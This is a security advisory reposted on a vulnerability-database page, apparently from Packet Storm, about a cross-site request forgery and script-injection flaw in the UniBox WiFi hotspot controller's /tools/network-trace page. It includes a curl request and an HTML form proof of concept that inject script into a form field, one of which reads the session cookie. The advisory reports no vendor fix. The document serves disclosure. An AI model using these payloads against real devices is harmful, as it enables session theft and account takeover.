Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Unibox Cross Site Request Forgery

🗓️ 08 Feb 2021 00:00:00Reported by Kaustubh G. PadwadType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 315 Views

Unibox Cross Site Request Forgery leads to Account Takeover in UNIBOX WiFi Hotspot Controlle

Code
`=====================================================  
Authenticated XSRF leads to complete Account Takeover  
=====================================================  
  
. contents:: Table Of Content  
  
Overview  
========  
  
Title:- Authenticated XSRF leads to complete account takeover in all  
UNIBOX WiFi Hotspot Controller.  
CVE ID:- Not -Yet - Assign  
Author: Kaustubh G. Padwad  
Vendor: Wifi-soft (https://www.wifi-soft.com/)  
Products:  
1.Unibox SMB  
2.UniBox - Enterprise Series  
3.UniBox - Campus Series  
  
Tested Version: :Controller Model : U-50 | UniBox 2.4 (Respetive for others)  
Severity: High--Critical  
  
Advisory ID  
============  
KSA-Dev-008  
  
  
About the Product:  
==================  
UniBox is one of the most innovative and reliable Hotspot Controllers in  
the market today. You can install UniBox to manage any sized WiFi  
network without having to replace any existing infrastructure. With  
UniBox, you don't need any other solution for managing WiFi access. It  
comes packed with features so just one box is enough to handle all the  
functions of WiFi hotspots.  
  
Description:  
============  
An issue was discovered on Unibox U-50 with version Unibox 2.4 and  
poterntially respected all other devices. There is CSRF via  
/tools/network-trace with resultant XSS due to lack of csrf token and  
user input validation.  
  
Additional Information  
======================  
The web interface of the SMB Unibox does not validate the csrftoken,and  
the /tools/network-trace page does not properly sanitize the  
user input which leads to xss, By combining this two attack we can form  
the XSRF request which leads to complete account takeover using XSRF.  
  
[Vulnerability Type]  
====================  
Cross Site Request Forgery (CSRF)  
  
How to Reproduce: (POC):  
========================  
curl -i -s -k -X $'POST' \  
-H $'Host: 'IP-OF-Device' -H $'User-Agent: Mozilla/5.0 (X11; Linux  
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H  
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'  
-H $'Referer: http://IP-OF-Device/tools/network-trace' -H  
$'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length:  
130' -H $'Connection: close' -H $'Cookie:  
PHPSESSID=86i9fsqxxxxxxxxxxxxxx' -H $'Upgrade-Insecure-Requests: 1' \  
-b $'PHPSESSID=86i9fsq22vi4vxxxxxxxxxxxx' \  
--data-binary  
$'port=lan&duration=600&noofpackets=100&sizelimit=128&filter=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&formsubmit=Start+Trace'  
\  
$'http://ip-of-device/tools/network-trace'  
  
Vulnerable Pages to XSS :- http://xxx.xxx.xx.xx/authentication/list_users  
  
http://xxx.xxx.xx.xx/authentication/list_byod?usertype=raduser  
http://xxx.xxx.xx.xx/reports/dhcp_leases  
http://xxx.xxx.xx.xx/go?rid=202  
CSRF POC  
--------  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://ip-of-device/tools/network-trace" method="POST">  
<input type="hidden" name="port" value="lan" />  
<input type="hidden" name="duration" value="600" />  
<input type="hidden" name="noofpackets" value="100" />  
<input type="hidden" name="sizelimit" value="128" />  
<input type="hidden" name="filter"  
value=""/><script>alert(document.cookie)</script>" />  
<input type="hidden" name="formsubmit" value="Start Trace" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
[Affected Component]  
/tools/network-trace and CSRF Vulnerabilities,  
  
------------------------------------------  
  
[Attack Type]  
Remote  
  
------------------------------------------  
  
[Impact Code execution]  
True  
  
------------------------------------------  
  
[Attack Vectors]  
once victim open the crafted url the device will get compromise  
  
Mitigation  
==========  
  
  
Disclosure:  
===========  
07-JAN-2020 Discoverd the Vulnerability, and asked for conact details.  
08-JAN-2020 Reported via contact form.  
20-JAN-2020 Vendor responded and given a call  
23-JAN-2021 Requested Update from Vendor  
xxxxxxxxxxxx No Communication Recived further  
  
  
[Vendor of Product]  
WiF-Soft (http://https://www.wifi-soft.com/company/about.php)  
  
credits:  
========  
* Kaustubh Padwad  
* Information Security Researcher  
* [email protected]  
* https://s3curityb3ast.github.io/  
* https://twitter.com/s3curityb3ast  
* http://breakthesec.com  
* https://www.linkedin.com/in/kaustubhpadwad  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2021 00:00Current
0.6Low risk
Vulners AI Score0.6
uniboxcsrfaccount takeoverwifi-softxsrfvulnerabilitynetwork-tracexsssecurityhotspot controller
315